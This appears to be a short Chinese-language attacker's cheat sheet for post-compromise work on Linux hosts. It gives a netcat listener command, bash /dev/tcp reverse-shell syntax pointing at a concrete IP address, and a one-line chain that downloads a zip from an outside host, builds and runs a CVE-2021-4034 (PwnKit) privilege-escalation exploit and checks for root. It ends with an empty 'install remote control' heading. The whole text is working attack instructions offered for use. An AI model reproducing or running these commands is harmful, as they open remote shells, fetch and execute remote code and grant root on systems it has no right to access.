在















# 命令
nc -lvnp 666
执行这个脚本用于接收 现在就可以使用 gsl 进行反弹了
# 反弹语法
bash -i >&/dev/tcp/{自己的IP}/666 0>&1
# 案例
bash -i >&/dev/tcp/143.92.61.142/666 0>&1

提权

#集成命令
cd /tmp && wget http://wkefu.cc/4034.zip && unzip 4034.zip
cd CVE-2021-4034-main && make
export PATH=/usr/bin:/usr/local/arm/4.3.2/bin:$PATH && make
chmod 777 cve-2021-4034
./cve-2021-4034 2> /dev/null && echo 'root_ok' || echo 'root_no'
id
安装远控


安装远控

